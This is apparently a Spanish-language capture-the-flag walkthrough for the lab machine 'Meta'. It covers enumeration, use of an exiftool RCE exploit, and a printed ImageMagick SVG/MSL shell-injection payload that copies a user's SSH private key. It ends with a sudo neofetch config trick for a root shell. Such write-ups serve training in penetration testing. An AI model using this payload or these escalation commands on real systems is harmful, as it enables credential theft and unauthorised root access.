# Meta

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

## Nmap Scan
```
Nmap scan report for 10.10.11.140
Host is up (0.067s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://artcorp.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

`nano /etc/hosts`
`10.10.11.140    artcorp.htb`

`gobuster vhost -u http://artcorp.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt`
`10.10.11.140    artcorp.htb dev01.artcorp.htb`

`http://dev01.artcorp.htb/metaview/`

### CVE-2021-22204-exiftool

`python3 exploit.py`

## Escalada de Privilegios (User)

`bash linpeas.sh`
`/tmp/pspy64`

`cat /usr/local/bin/convert_images.sh`

##### doom.svg
```
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa) > /dev/shm/key`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:doom.svg" height="100" width="100"/>
  </svg>
</image>
```

`strings /dev/shm/key`
`cat key | sed 's/ /\n/g' > thomaskey`
`chmod 400 thomaskey`
`ssh -i thomaskey thomas@10.10.11.140`

## Escalada de Privilegios (Root)

`sudo -l`
`export XDG_CONFIG_HOME=/home/thomas/.config`
`echo '/bin/bash' >> /home/thomas/.config/neofetch/config.conf`
`sudo /usr/bin/neofetch \"\"`




## Referencias
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/ \
https://github.com/convisolabs/CVE-2021-22204-exiftool \
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html